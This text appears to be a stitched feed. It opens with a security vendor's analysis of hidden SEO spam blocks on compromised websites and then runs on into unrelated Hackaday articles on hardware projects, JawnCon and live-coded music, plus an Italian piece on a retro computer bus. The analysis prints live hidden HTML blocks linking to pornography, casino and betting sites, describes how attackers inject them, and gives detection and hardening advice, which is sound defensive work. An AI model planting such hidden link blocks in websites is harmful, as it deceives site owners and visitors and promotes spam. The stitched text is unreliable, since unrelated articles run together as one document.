<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">aflamk2 <a href="https://www.pornvideoswatch.net/" target="_self" title="pornvideoswatch.net">pornvideoswatch.net</a> نيك ثمينات</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">hentaifox futanari <a href="https://www.hentaitale.net/" target="_blank" title="hentaitale.net pisuhame">hentaitale.net</a> hen hentai</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">video sexy wallpaper <a href="https://povporntrends.com" target="_blank">povporntrends.com</a> bengolibf</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">persona 5 hentai manga <a href="https://www.younghentai.net/" rel="dofollow" target="_self" title="younghentai.net oni hentai">younghentai.net</a> toys hentai</div>This example demonstrates a slightly more sophisticated approach to hiding the block containing Black Hat SEO content. It suggests an attempt to bypass the automated search engine filters that easily detect the display:none; parameter.
Let us analyze the set of CSS styles: <div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">. The properties position: absolute;height:0pt;width:0pt; remove the block from the visible area of the page, while overflow: auto prevents the content from being displayed even if it exceeds zero dimensions. This makes the links inaccessible to humans, but it does not prevent them from being preserved in the DOM (document object model). That’s why HTML code scanning systems, such as search engines, are able to see it.
In addition to the zero dimensions of the block, in this example, just as in the previous one, we see the attribute rel="dofollow", as well as many links to pornographic websites with relevant keywords.
The combination of styles that sets the block dimensions to zero is less obvious than display:none; because the element is technically present in the rendering, although it is not visible to the user. Nevertheless, it is worth noting that modern search engine security algorithms, such as Google Penguin, detect this technique too. To counter this, malicious actors may employ more complex techniques for evading detection. Here is another example:
<script src="files/layout/js/slider3d.js?v=0d6651e2"></script><script src="files/layout/js/layout.js?v=51a52ad1"></script>
<style type="text/css">.ads-gold {height: 280px;overflow: auto;color: transparent;}.ads-gold::-webkit-scrollbar { display: none;}.ads-gold a {color: transparent;}.ads-gold {font-size: 10px;}.ads-gold {height: 0px;overflow: hidden;}</style>
<div class="ads-gold">
Ganhe Rápido nos Jogos Populares do Cassino Online <a href="https://580-bet.com" target="_blank">580bet</a>
Cassino <a href="https://bet-7k.com" target="_blank">bet 7k</a>: Diversão e Grandes Vitórias Esperam por Você
Aposte e Vença no Cassino <a href="https://leao-88.com" target="_blank">leao</a> – Jogos Fáceis e Populares
Jogos Populares e Grandes Prêmios no Cassino Online <a href="https://luck-2.com" target="_blank">luck 2</a>
Descubra os Jogos Mais Populares no Cassino <a href="https://john-bet.com" target="_blank">john bet</a> e Ganhe
<a href="https://7755-bet.com" target="_blank">7755 bet</a>: Apostas Fáceis, Grandes Oportunidades de Vitória
Jogue no Cassino Online <a href="https://cbet-88.com" target="_blank">cbet</a> e Aumente suas Chances de Ganhar
Ganhe Prêmios Incríveis com Jogos Populares no Cassino <a href="https://bet7-88.com" target="_blank">bet7</a>
Cassino <a href="https://pk55-88.com" target="_blank">pk55</a>: Onde a Sorte Está ao Seu Lado
Experimente o Cassino <a href="https://8800-bet.com" target="_blank">8800 bet</a> e Ganhe com Jogos Populares
Ganhe Facilmente no Cassino Online <a href="https://doce-88.com" target="_blank">doce</a>
Aposte e Vença no Cassino <a href="https://bet-4-br.com" target="_blank">bet 4</a>
Jogos Populares e Grandes Premiações na <a href="https://f12--bet.com" target="_blank">f12bet</a>
Descubra a Diversão e Vitória no Cassino <a href="https://bet-7-br.com" target="_blank">bet7</a>
Aposte nos Jogos Mais Populares do Cassino <a href="https://ggbet-88.com" target="_blank">ggbet</a>
Ganhe Prêmios Rápidos no Cassino Online <a href="https://bet77-88.com" target="_blank">bet77</a>
Jogos Fáceis e Rápidos no Cassino <a href="https://mrbet-88.com" target="_blank">mrbet</a>
Jogue e Ganhe com Facilidade no Cassino <a href="https://bet61-88.com" target="_blank">bet61</a>
Cassino <a href="https://tvbet-88.com" target="_blank">tvbet</a>: Onde a Sorte Está Ao Seu Lado
Aposte nos Melhores Jogos do Cassino Online <a href="https://pgwin-88.com" target="_blank">pgwin</a>
Ganhe Grande no Cassino <a href="https://today-88.com" target="_blank">today</a> com Jogos Populares
Cassino <a href="https://fuwin-88.com" target="_blank">fuwin</a>: Grandes Vitórias Esperam por Você
Experimente os Melhores Jogos no Cassino <a href="https://brwin-88.com" target="_blank">brwin</a>
</div></body>
Aside from the parameters we are already familiar with, which are responsible for concealing a block ( height:0px,color:transparent,overflow:hidden), and the name that hints at its contents ( \<style type="text/css"\>.ads-gold), strings with scripts in this example can be found at the very beginning: <script src="files/layout/js/slider3d.js?v=0d6651e2"></script> and <script src="files/layout/js/layout.js?v=51a52ad1"></script>. These indicate that external JavaScript can dynamically control the page content, for example, by adding or changing hidden links, that is, modifying this block in real time.
This is a more advanced approach than the ones in the previous examples. Yet it is also detected by filters responsible for identifying suspicious manipulations.
Other parameters and attributes exist that attackers use to conceal a link block. These, however, can also be detected:
- the parameter visibility:hidden; can sometimes be seen instead of display:none;.
- Within position:absolute;, the block with hidden links may not have a zero size, but rather be located far beyond the visible area of the page. This can be set, for example, via the property left:-9232px;, as in the example below.
<div style="position: absolute; left: -9232px">
<a href="https://romabet.cam/">روما بت</a><br>
<a href="https://mahbet.cam/">ماه بت</a><br>
<a href="https://pinbahis.com.co/">پین باهیس</a><br>
<a href="https://bettingmagazine.org/">بهترین سایت شرط بندی</a><br>
<a href="https://1betcart.com/">بت کارت</a><br>
<a href="https:// yasbet.com.co/">یاس بت</a><br>
<a href="https://yekbet.cam/">یک بت</a><br>
<a href="https://megapari.cam/">مگاپاری </a><br>
<a href="https://onjabet.net/">اونجا بت</a><br>
<a href="https://alvinbet.org/">alvinbet.org</a><br>
<a href="https://2betboro.com/">بت برو</a><br>
<a href="https://betfa.cam/">بت فا</a><br>
<a href="https://betforward.help/">بت فوروارد</a><br>
<a href="https://1xbete.org/">وان ایکس بت</a><br>
<a href="https://1win-giris.com.co/">1win giriş</a><br>
<a href="https://betwiner.org/">بت وینر</a><br>
<a href="https://4shart.com/">بهترین سایت شرط بندی ایرانی</a><br>
<a href="https://1xbetgiris.cam">1xbet giriş</a><br>
<a href="https://1kickbet1.com/">وان کیک بت</a><br>
<a href="https://winbet-bet.com/">وین بت</a><br>
<a href="https://ritzobet.org/">ریتزو بت</a><br>
How attackers place hidden links on other people’s websites
To place hidden links, attackers typically exploit website configuration errors and vulnerabilities. This may be a weak or compromised password for an administrator account, plugins or an engine that have not been updated in a long time, poor filtering of user inputs, or security issues on the hosting provider’s side. Furthermore, attackers may attempt to exploit the human factor, for example, by setting up targeted or mass phishing attacks in the hope of obtaining the website administrator’s credentials.
Let us examine in detail the various mechanisms through which an attacker gains access to editing a page’s HTML code.
- Compromise of the administrator password. An attacker may guess the password, use phishing to trick the victim into giving it away, or steal it with the help of malware. Furthermore, the password may be found in a database of leaked credentials. Site administrators frequently use simple passwords for control panel protection or, even worse, leave the default password, thereby simplifying the task for the attacker.
After gaining access to the admin panel, the attacker can directly edit the page’s HTML code or install their own plugins with hidden SEO blocks. - Exploitation of CMS (WordPress, Joomla, Drupal) vulnerabilities. If the engine or plugins are out of date, attackers use known vulnerabilities (SQL Injection, RCE, or XSS) to gain access to the site’s code. After that, depending on the level of access gained by exploiting the vulnerability, they can modify template files (header.php, footer.php, index.php, etc.), insert invisible blocks into arbitrary site pages, and so on.
In SQL injection attacks, the hacker injects their malicious SQL code into a database query. Many websites, from news portals to online stores, store their content (text, product descriptions, and news) in a database. If an SQL query, such as SELECT *FROM posts WHERE id='$id' allows passing arbitrary data, the attacker can use the $id field to inject their code. This allows the attacker to change the content of records, for example, by inserting HTML with hidden blocks.
In RCE (remote code execution) attacks, the attacker gains the ability to run their own commands on the server where the website runs. Unlike SQL injections, which are limited to the database, RCE provides almost complete control over the system. For example, it allows the attacker to create or modify site files, upload malicious scripts, and, of course, inject invisible blocks.
In an XSS (cross-site scripting) attack, the attacker injects their JavaScript code directly into the web page by using vulnerable input fields, such as those for comments or search queries. When another user visits this page, the malicious script automatically executes in their browser. Such a script enables the attacker to perform various malicious actions, including stealthily adding a hidden <div> block with invisible links to the page. For XSS, the attacker does not need direct access to the server or database, as in the case with SQL injection or RCE; they only need to find a single vulnerability on the website. - An attack via the hosting provider. In addition to directly hacking the target website, an attacker may attempt to gain access to the website through the hosting environment. If the hosting provider’s server is poorly secured, there is a risk of it being compromised. Furthermore, if multiple websites or web applications run on the same server, a vulnerability in one of them can jeopardize all other projects. The attacker’s capabilities depend on the level of access to the server. These capabilities may include: injecting hidden blocks into page templates, substituting files, modifying databases, connecting external scripts to multiple websites simultaneously, and so forth. Meanwhile, the website administrator may not notice the problem because the vulnerability is being exploited within the server environment rather than the website code.
Note that hidden links appearing on a website is not always a sign of a cyberattack. The issue often arises during the development phase, for example, if an illegal copy of a template is downloaded to save money or if the project is executed by an unscrupulous web developer.
Why attackers place hidden blocks on websites
One of the most obvious goals for injecting hidden blocks into other people’s websites is to steal the PageRank from the victim. The more popular and authoritative the website is, the more interesting it is to attackers. However, this does not mean that moderate- or low-traffic websites are safe. As a rule, administrators of popular websites and large platforms do their best to adhere to security rules, so it is not so easy to get close to them. Therefore, attackers may target less popular – and less protected – websites.
As previously mentioned, this approach to promoting websites is easily detected and blocked by search engines. In the short term, though, attackers still benefit from this: they manage to drive traffic to the websites that interest them until search engine algorithms detect the violation.
Even though the user does not see the hidden block and cannot click the links, attackers can use scripts to boost traffic to their websites. One possible scenario involves JavaScript creating an iframe in the background or sending an HTTP request to the website from the hidden block, which then receives information about the visit.
Hidden links can lead not just to pornographic or other questionable websites but also to websites with low-quality content whose sole purpose is to be promoted and subsequently sold, or to phishing and malicious websites. In more sophisticated schemes, the script that provides “visits” to such websites may load malicious code into the victim’s browser.
Finally, hidden links allow attackers to lower the reputation of the targeted website and harm its standing with search engines. This threat is especially relevant in light of the fact that algorithms such as Google Penguin penalize websites hosting questionable links. Attackers may use these techniques as a tool for unfair competition, hacktivism, or any other activity that involves discrediting certain organizations or individuals.
Interestingly, in 2025, we have more frequently encountered hidden blocks with links to pornographic websites and online casinos on various legitimate websites. With low confidence, we can suggest that this is partly due to the development of neural networks, which make it easy to automate such attacks, and partly due to the regular updates to Google’s anti-spam systems, the latest of which was completed at the end of September 2025: attackers may have rushed to maximize their gains before the search engine made it a little harder for them.
Consequences for the victim website
The consequences for the victim website can vary in severity. At a minimum, the presence of hidden links placed by unauthorized parties hurts search engine reputation, which may lead to lower search rankings or even complete exclusion from search results. However, even without any penalties, the links disrupt the internal linking structure because they lead to external websites and pass on a portion of the victim’s weight to them. This negatively impacts the rankings of key pages.
Although unseen by visitors, hidden links can be discovered by external auditors, content analysis systems, or researchers who report such findings in public reports. This is something that can undermine trust in the website. For example, sites where our categorization engine detects links to pornography pages will be classified as “Adult content”. Consequently, all of our clients who use web filters to block this category will be unable to visit the website. Furthermore, information about a website’s category is published on our Kaspersky Threat Intelligence Portal and available to anyone wishing to look up its reputation.
If the website is being used to distribute illegal or fraudulent content, the issue enters the legal realm, with the owner potentially facing lawsuits from copyright holders or regulators. For example, if the links lead to websites that distribute pirated content, the site may be considered an intermediary in copyright infringement. If the hidden block contains malicious scripts or automatic redirects to questionable websites, such as phishing pages, the owner can be charged with fraud or some other cybercrime.
How to detect a hidden link block on your website
The simplest and most accessible method for any user to check a website for a hidden block is to view its source code in the browser. This is very easy to do. Navigate to the website, press Control+U, and the website’s code will open in the next tab. Search (Control+F) the code for the following keywords: display:none,visibility:hidden,opacity:0,height:0,width:0,position:absolute. In addition, you can check for keywords that are characteristic of the hidden content itself. When it comes to links that point to adult or gambling sites, you should look for porn,sex,casino,card, and the like.
A slightly more complex method is using web developer tools to investigate the DOM for invisible blocks. After the page fully loads, open DevTools (F12) in the browser and go to the Elements tab. Search (Control+F) for keywords such as <a,iframe,display:none,hidden,opacity. Hover your cursor over suspicious elements in the code so the browser highlights their location on the page. If the block occupies zero area or is located outside the visible area, that is an indicator of a hidden element. Check the Computed tab for the selected element; there, you can see the applied CSS styles and confirm that it is hidden from the user’s view.
You can also utilize specialized SEO tools. These are typically third-party solutions that scan website SEO data and generate reports. They can provide a report about suspicious links as well. Few of them are free, but when selecting a tool, you should be guided primarily by the vendor’s reputation rather than price. It is better to use tried-and-true, well-known services that are known to be free of malicious or questionable payloads. Examples of these trusted services include Google Search Console, Bing Webmaster Tools, OpenLinkProfiler, and SEO Minion.
Another way to discover hidden SEO spam on a website is to check the CMS itself and its files. First, you should scan the database tables for suspicious HTML tags with third-party links that may have been inserted by attackers, and also carefully examine the website’s template files (header.php, footer.php, and index.php) and included modules for unfamiliar or suspicious code. Pay particular attention to encrypted insertions, unclear scripts, or links that should not originally be present in the website’s structure.
Additionally, you can look up your website’s reputation on the Kaspersky Threat Intelligence Portal. If you find it in an uncharacteristic category – typically “Adult content”, “Sexually explicit”, or “Gambling” – there is a high probability that there is a hidden SEO spam block embedded in your website.
How to protect your website
To prevent hidden links from appearing on your website, avoid unlicensed templates, themes, and other pre-packaged solutions. The entire site infrastructure must be built only on licensed and official solutions. The same principle applies to webmasters and companies you hire to build your website: we recommend checking their work for hidden links, but also for vulnerabilities in general. Never cut corners when it comes to security.
Keep your CMS, themes, and plugins up to date, as new versions often patch known vulnerabilities that attackers can exploit. Delete any unused plugins and themes, if any. The less unnecessary components are installed, the lower the risk of an exploit in one of the extensions, plugins, and themes. It is worth noting that this risk never disappears completely – it is still there even if you have a minimal set of components as long as they are outdated or poorly secured.
To protect files and the server, it is important to properly configure access permissions. On servers running Linux and other Unix-like systems, use 644 for files and 755 for folders. This means that the owner can open folders, and read and modify folders and files, while the group and other users can only read files and open folders. If write access is not necessary, for example in template folders, forbid it altogether to lower the risk of malicious actors making unauthorized changes. Furthermore, you must set up regular, automatic website backups so that data can be quickly restored if there is an issue.
Additionally, it is worth using web application firewalls (WAFs), which help block malicious requests and protect the site from external attacks. This solution is available in Kaspersky DDoS Protection.
To protect the administrator panel, use only strong passwords and 2FA (Two-Factor Authentication) at all times. You would be well-advised to restrict access to the admin panel by IP address if you can. Only a limited group of individuals should be granted admin privileges.
Chicken Squisher 3000: Squish-Proof Security
Keeping chickens in predator-prone areas demands serious fortifications, but even the most robust coop can become a hassle without automation. That’s where [lcamtuf] steps in with his Chicken Squisher 3000, a clever DIY automatic door mechanism that opens and closes based on ambient light levels.
The chicken coop he previously built did not include a mechanism to automatically close the inner door at night, meaning that arrangements would have to be made should [lcamtuf] want to leave town for a couple of days. Not wanting to go with a commercial option for this door as that would require a good deal of modifications to the original door setup, the Chicken Squisher 3000 adds minimal parts to the existing door to now open and close the door at dawn and dusk.
Using a 12 V DC motor with a gear reduction, he was able to generate more than enough torque to open and close the thick wooden door. Instead of a complex geared rack and pinion setup, [lcamtuf] has the motor mounted to a smooth rod that then applies force across the swing of the door attached with a rod end bearing. Driving the door’s automation is an AVR16DD14 microcontroller which is used to read the NSL-A6009 light sensor. [lcamtuf] uses a DRV8231 motor driver for controlling power going to that 12 V motor with the added benefit of being able to adjust stall torque to dial in a value strong enough to overcome the wooden door’s friction, but weak enough to not endanger any of his birds. There are also buttons on the metal enclosure used to override the light sensor should he want to override it manually.
Thanks, [lcamtuf], for sending in your latest weekend project; we love the resourcefulness of using just a handful of cheap parts to make a robust solution for your coop. If you haven’t seen them yet, be sure to check out some of our other chicken coop door hacks featured before.
A Deep Dive into Molten Bismuth
Bismuth is known for a few things: its low melting point, high density, and psychedelic hopper crystals. A literal deep-dive into any molten metal would be a terrible idea, regardless of low melting point, but [Electron Impressions]’s video on “Why Do Bismuth Crystals Look Like That” may be the most educational eight minutes posted to YouTube in the past week.
The whole video is worth a watch, but since spoilers are the point of these articles, we’ll let you in on the secret: it all comes down to Free Energy. No, not the perpetual motion scam sort of free energy, but the potential that is minimized in any chemical reaction. There’s potential energy to be had in crystal formation, after all, and nature is always (to the extent possible) going to minimize the amount left on the table.
In bismuth crystals– at least when you have a pot slowly cooling at standard temperature and pressure–that means instead of a large version of the rhombahedral crystal you might naively expect if you’ve tried growing salt or sugar crystals in beakers, you get the madman’s maze that actually emerges. The reason for this is that atoms are preferentially deposited onto the vertexes and edges of the growing crystal rather than the face. That tends to lead to more vertexes and edges until you get the fractal spirals that a good bismuth crystal is known for. (It’s not unlike the mechanism by which the dreaded tin whiskers grow, as a matter of fact.)
Bismuth isn’t actually special in this respect; indeed, nothing in this video would not apply to other metals, in the right conditions. It just so happens that “the right conditions” in terms of crystal growth and the cooling of the melt are trivial to achieve when melting Bismuth in a way that they aren’t when melting, say, Aluminum in the back yard. [Electron Impressions] doesn’t mention because he is laser-focused on Bismuth here, but hopper crystals of everything from table salt to gold have been produced in the lab. When cooling goes to quick, it’s “any port in a storm” and atoms slam into solid phase without a care for the crystal structure, and you get fine-grained, polycrystaline solids; when it goes slowly enough, the underlying crystal geometry can dominate. Hopper crystals exist in a weird and delightful middle ground that’s totally worth eight minutes to learn about.
Aside from being easy to grow into delightful crystals, bismuth can also be useful when desoldering, and, oddly enough, making the world’s fastest transistor.
youtube.com/embed/wKo69nS2xVg?…
Positive Results with Negative Resistance
Try an experiment. Next time you are in a room with someone, ask them to name everything in the room. Only certain kinds of people will say “air” or “light.” For most people, those are just givens, and you don’t think about them unless, for some reason, you don’t have them. Resistance is like that in electronics. You use it constantly, but do you ever think much about what it is? For a resistor, the value in ohms really represents the slope of the line that describes the amount of voltage you’ll see across the component when it carries a certain amount of current. For resistors, that slope is — at least in theory — constant and positive. But [Void Electronics] made a video exploring negative resistance, and it is worth watching, below.
If you haven’t seen negative resistance before, you might wonder how that is possible. Ohm’s law is just a shorthand for calculating the slope of a graph with voltage on the Y axis and current on the X axis. It works because the voltage and current are always zero at the same time, so the slope is (V-0)/(I-0), and we just shorten that to the normal Ohm’s law equation.
But not everything has a linear response to current. Some devices will have different slopes over different current regions. And sometimes that slope can be negative, meaning that an increase in current through the device will cause it to drop less voltage. Of course, this is usually just over a narrow range and, as [Void] points out, most devices don’t specify that parameter on their data sheets. In fact, some transistors won’t even work in the circuit.
The circuit in question in the video below the break is an odd one. It uses two resistors, an LED, and a transistor. But the transistor’s base is left disconnected. No 555 needed. How does it work? Watch the video and you’ll see. There’s even a curve tracer if you don’t like to see hand-drawn graphs.
We’ve looked at negative resistance more than once. There are a few exotic devices, like tunnel diodes, that are explicitly used for the negative resistance property. When the gas in a neon bulb breaks down, you get the same effect.
youtube.com/embed/jqUyaGwFd10?…
After Trucking Them Home, Old Solar Panels Keep On Trucking
The fact that there exist in our world flat rocks that make lightning when you point them at the sun is one of the most unappreciated bits of wizardry in this modern age. As hackers, we love all this of techno-wizardry–but some of us abhor paying full price for it. Like cars, one way to get a great discount is to buy used. [Backyard Solar Project] helped a friend analyze some 14-year-old panels to see just how they’d held up over the years, and it was actually better than we might have expected.
The big polycrystalline panels were rated at 235 W when new, and they got 6 of them for the low, low price of “get this junk off my property”. Big panels are a bit of a pain to move, but that’s still a great deal. Especially considering that after cleaning they averaged 180 W, a capacity factor of 77%. Before cleaning 14 years worth of accumulated grime cost about eight watts, on average, an argument for cleaning your panels. Under the same lighting conditions, the modern panel (rated to 200 W) was giving 82% of rated output.
That implies that after 14 years, the panels are still at about 94% of their original factory output, assuming the factory wasn’t being overoptimistic about the numbers to begin with. Still, assuming you can trust the marketing, a half a percent power drop per year isn’t too bad. It’s also believable, since the US National Renewably Energy Laboratory (yes, they have one) has done tests that put that better than the average of 0.75 %/yr. Of course the average American solar panel lives in a hotter climate than [Backyard Solar Project], which helps explain the slower degradation.
Now, we’re not your Dad or your accountant, so we’re not going to tell you if used solar panels are worth the effort. On the one hand, they still work, but on the other hand, the density is quite a bit lower. Just look at that sleek, modern 200 W panel next to the old 235 W unit. If you’re area-limited, you might want to spring for new, or at least the more energy-dense monocrystalline panels that have become standard the last 5 years or so, which aren’t likely to be given away just yet. On the gripping hand, free is free, and most of us are much more constrained by budget than by area. If nothing else, you might have a fence to stick old panels against; the vertical orientation is surprisingly effective at higher latitudes.
youtube.com/embed/3AKq6nlvP3E?…
2025 Component Abuse Challenge: An LED as a Light Dependent Capacitor
The function of an LED is to emit light when the device is forward biased within its operating range, and it’s known by most people that an LED can also operate as a photodiode. Perhaps some readers are also aware that a reverse biased LED also has a significant capacitance, to the extent that they can be used in some RF circuits in the place of a varicap diode. But how do those two unintentional properties of an LED collide? As it turns out, an LED can also behave as a light dependent capacitor. [Bornach] has done just that, and created a light dependent sawtooth oscillator.
The idea is simple enough, there is a capacitance between the two sides of the depletion zone in a reverse biased diode, and since an LED is designed such that its junction is exposed to the external light, any photons which hit it will change the charge on the junction. Since the size of the depletion zone and thus the capacitance is dependent on the voltage and thus the charge, incoming light can thus change the capacitance.
The circuit is a straightforward enough sawtooth oscillator using an op-amp with a diode in its feedback loop, but where we might expect to find a capacitor to ground on the input, we find our reverse biased LED. The video below the break shows it in operation, and it certainly works. There’s an interesting point here in that and LED in this mode is suggested as an alternative to a cadmium sulphide LDR, and it’s certainly quicker responding. We feel duty bound to remind readers that using the LED as a photodiode instead is likely to be a bit simpler.
This project is part of the Hackaday Component Abuse Challenge, in which competitors take humble parts and push them into applications they were never intended for. You still have time to submit your own work, so give it a go!
youtube.com/embed/lFQo_J6E04k?…
Un autobus diventa un museo itinerante di computer retrò nel Regno Unito
Nel Regno Unito, Jason e Luke Stoner, padre e figlio, hanno trasformato un vecchio scuolabus in un museo itinerante dedicato ai computer e alle console di gioco retrò. L’ispirazione è nata quando Luke ha visitato il celebre Computer Museum di Cambridge, decidendo di rendere la tecnologia vintage accessibile a un pubblico più ampio.
Così è nata Retro Reset, un’organizzazione no-profit che dall’autunno 2024 ha avviato il restauro completo del mezzo. Il progetto è stato portato a termine in appena un anno, con il museo di Cambridge tra i principali sponsor dell’iniziativa.
Attualmente, l’autobus percorre l’East Sussex facendo tappa in scuole, college e centri giovanili, con l’obiettivo di far conoscere a bambini e adolescenti la storia dell’informatica.
All’interno, gli spazi ospitano non solo console di varie epoche, ma anche una vasta gamma di componenti informatici: vecchi server, moduli di memoria, schede video, hard disk, floppy disk e altri dispositivi che permettono di osservare l’evoluzione dei PC nel tempo.
La mostra, compatta a causa delle dimensioni del mezzo, presenta circa dieci sistemi attivi contemporaneamente, aggiornati periodicamente.
Tra gli oggetti più pregiati vi è un computer utilizzato in passato per il montaggio di film di Hollywood. I visitatori hanno l’opportunità di interagire direttamente con le console, smontare PC e studiare i singoli componenti, partecipando ad attività pratiche di ingegneria.
Retro Reset non si limita a esporre oggetti storici: si tratta di una piattaforma interattiva che consente di vivere la storia del mondo digitale in prima persona. L’iniziativa potrebbe ispirare nuovi progetti simili, diffondendo la passione per i computer retrò e mantenendo viva la memoria tecnologica per le generazioni future.
Vi lasciamo con le parole dell’iniziativa:
“La nostra missione è far rivivere ai giovani l’affascinante storia dei computer e dei videogiochi. I nostri laboratori mobili, ospitati in un autobus splendidamente ristrutturato, offrono un viaggio pratico nel mondo della tecnologia retrò, esplorando l’evoluzione del gaming e dell’informatica dagli anni ’70 a oggi. Cosa ci rende unici? Non solo offriamo l’opportunità di giocare con le console classiche e di esplorare gadget vintage, ma diamo anche ai giovani la possibilità di maneggiare, smontare e sperimentare da vicino la tecnologia d’epoca. Dai computer retrò alle console di gioco iconiche, i ragazzi potranno comprendere appieno il funzionamento di queste macchine e come hanno contribuito a plasmare il mondo digitale che conosciamo oggi.”
L'articolo Un autobus diventa un museo itinerante di computer retrò nel Regno Unito proviene da Red Hot Cyber.
Three Years in, JawnCon Continues to Grow and Impress
Make no mistake, just getting a hacker con off the ground is a considerable challenge. But the really hard part comes after. To be more than a one-off success story, you’ve got to expand the event year after year in a manageable way. Go too slow, and attendees might lose interest. Move too fast, and you run the risk of going broke if your ticket sales don’t keep up with your ambitions.
Until then, let’s take a look at some of the projects that were on display at this year’s JawnCon. If it’s the talks you’re after, they’ll be edited and uploaded to the event’s YouTube page in the near future. In the meantime, the Friday and Saturday live streams are still available.
Meshtastic Spreads its Web
While it wasn’t officially part of JawnCon’s considerable network infrastructure playground, Meshtastic ended up being a big part of the two-day event. Members of Philly Mesh had a table where they were showing off a wide array of commercial and DIY nodes, the crew behind the Hacker Pager were offering up a special edition of the faux-retro portable communicator, and it seemed like every other attendee had brought their own mesh-capable gadget with them.
The end result was easily the most active Meshtastic environment I’ve ever personally found myself in. Wandering the con venue you could expect to see more than 100 individual nodes in the area, with the majority of them happily chattering away. Even during the off-hours on Friday and Saturday night, there was still plenty of mesh activity between the two main hotels where many of the attendees were staying.
Having a relatively active mesh added a new dynamic to the con. Occasionally, pieces of real-time information would make its way through the net, such as what time the nearby cafe was opening, or which talk was currently taking place. A few times it allowed for quick response to semi-emergencies, such as when some hackers which shall remain nameless ended up causing a minor spill, and found themselves in need of cleaning supplies.
It also provided even more data to pore over — since the con wrapped, an SQLite database containing every packet that went through the mesh has been floating around for anyone who wants to analyze it. Hope nobody said anything they’ll regret…
Wardrive All the Things
The rig, enclosed in a rugged orange case and powered by batteries, exists at least in part so that [BusySignal] can show off the considerable capabilities of Kismet. He argues that the open source wireless sniffing suite is capable of much more than casual users may realize, and wants to inspire developers and hackers to add new protocols to the already impressive array of signals that it’s able to ingest and display.
This exploration of Kismet’s capabilities was the subject of his Saturday talk, Get More Radio Frequency Curious. Definitely one to keep an eye out for when the edited talks start hitting the JawnCon YouTube channel.
GameTank Comes Out to Play
Tucked away in one corner of the chill out area was an 8-bit game system that the passerby might have thought was a relic from the 1980s. But on closer inspection, its 3D printed shell quickly gives away the fact that is no classic machine.
The GameTank is an open source hardware retroconsole designed around the 6502, more specifically, the modern W65C02S variant. Clyde Shaffer created the system in the spirit of other fantasy consoles like the Pico-8, with the key difference being that he started from the physical console and worked his way forward from there. It features a modernized development and debugging environment for both C and Rust, including an emulator that will run on Windows, Linux, Mac OS. In fact, if you can take a hit to the performance, the emulator can even run right in the web browser — making it easy to check out the GameTank’s library of games.
We’ve actually covered the GameTank here on Hackaday in the past, but seeing it in person, you really appreciate all the little details. The cartridges specifically are a very nice touch. Of course, we know that a single modern SPI flash chip could allow the GameTank to hold hundreds (if not thousands) of games internally. Yet there’s just something so nostalgic about rummaging through pile of cartridges, searching for a particular game, and then slamming it home into the console.
But is it any fun to play? To that end, I’m happy to say it passed the test with a few of the kids that ended up coming to JawnCon with their parents. I overheard someone at the lock picking table saying that their son had abandoned his expensive Nintendo Switch on the table in favor of pulling up a chair to the GameTank and basking in its CRT glory. Maybe the kids will be alright after all.
The Next Jawneration
It’s obviously very early to predict what the next JawnCon will look like. After all, a lot can happen in the next 359 days.
But having had the good fortune to attend all three of these events and see its trajectory, I can say in my mumble opinion that JawnCon is approaching an inflection point of sorts. While the area of Arcadia University that’s been made available for the con since its inception has never been particularly large, this was the first year it actually started to feel small. It’s no exaggeration to say that on several occasions, I struggled to find a surface flat enough to put my laptop down — whether it was lock picks, stickers, payphones, or even just cabling — literally every table in the room had something on it.
Of course, this isn’t necessarily a bad thing. If the worst that can be said about a hacker con was that it had a lot of people and so much interesting stuff on display that you couldn’t find a place to sit down, count me in. But in the same way keeping a plant in a pot that’s too small can stunt its growth, I think JawnCon will need to find a way to stretch its legs if it’s to remain healthy over the long term.
That being said, I plan on being there in 2026, and if you’re in the Philadelphia area, so you should you. Even if it means we might have to take turns sitting in each other’s laps.
Live Coding Techno With Strudel
The super talented [Switch Angel] is an electronic music artist, with a few cool YouTube videos to show off their absolute nailing of how to live code with Strudel. For us mere mortals, Strudel is a JavaScript port of TidalCycles, which is an algorithmic music generator which supports live coding, i.e. the music that is passed down to the synthesizer changes on-the-fly as you manipulate the code. It’s magical to watch (and listen!) to how you can adapt and distort the music to your whims just by tweaking a few lines of code: no compilation steps, hardly any debugging and instant results.
The traditional view of music generators like this is to create lists of note/instrument pairs with appropriate modifiers. Each sound is specified in sequence — adding a sound extends the sequence a little. Strudel / Tidalcycles works a little differently and is based on the idea of repeating patterns over a fixed time. Adding an extra sound or breaking down one sound slot into multiple sounds squeezes all the remaining slots down, causing the whole pattern to repeat in the same period, with the sounds individually taking up less space. This simple change makes it really easy to add layer upon layer of interest within a sequence with a few extra characters, without recalculating everything else to fit. On top of this base, multiple effects can be layered—more than we can mention here—and all can be adjusted with pop-in sliders directly in the code.
You see, the code is also the visualizer. As the sequence runs, the notes and time periods are highlighted, with piano rolls and oscilloscope views adding to the visuals to help guide you. Tweaking the various components of the sound composition in real time with embedded sliders is a quick and easy way to smoothly hear the impact of settings. It just makes sense. Additionally, since Strudel is written in JavaScript, you can pull in external libraries of customized functions to make your code more straightforward to read, like this short library from [Switch Angel].
On the back end, the built-in web-based synthesizer is basic but functional for roughing out. Still, for absolute control, you’re going to want to send the notes over to something like SuperCollider or Sonic Pi. This is easy because Strudel supports OSC, making it a simple, configurable item.
If you were thinking that you’ve seen a JavaScript-based generative music thing before, you’d be right. Whilst we’re thinking about generative music and generative art in general, what about having a look at this neat sound-and-light sculpture?
youtube.com/embed/GWXCCBsOMSg?…
youtube.com/embed/aPsq5nqvhxg?…
Thanks to [JohnU] for sending this in!
A Tale of Two Car Design Philosophies
As a classic car enthusiast, my passion revolves around cars with a Made in West Germany stamp somewhere on them, partially because that phrase generally implied a reputation for mechanical honesty and engineering sanity. Air-cooled Volkswagens are my favorites, and in fact I wrote about these, and my own ’72 Super Beetle, almost a decade ago. The platform is incredibly versatile and hackable, not to mention inexpensive and repairable thanks to its design as a practical, affordable car originally meant for German families in the post-war era and which eventually spread worldwide. My other soft-spot is a car that might seem almost diametrically opposed to early VWs in its design philosophy: the Mercedes 300D. While it was a luxury vehicle, expensive and overbuilt in comparison to classic Volkswagens, the engineers’ design choices ultimately earned it a reputation as one of the most reliable cars ever made.
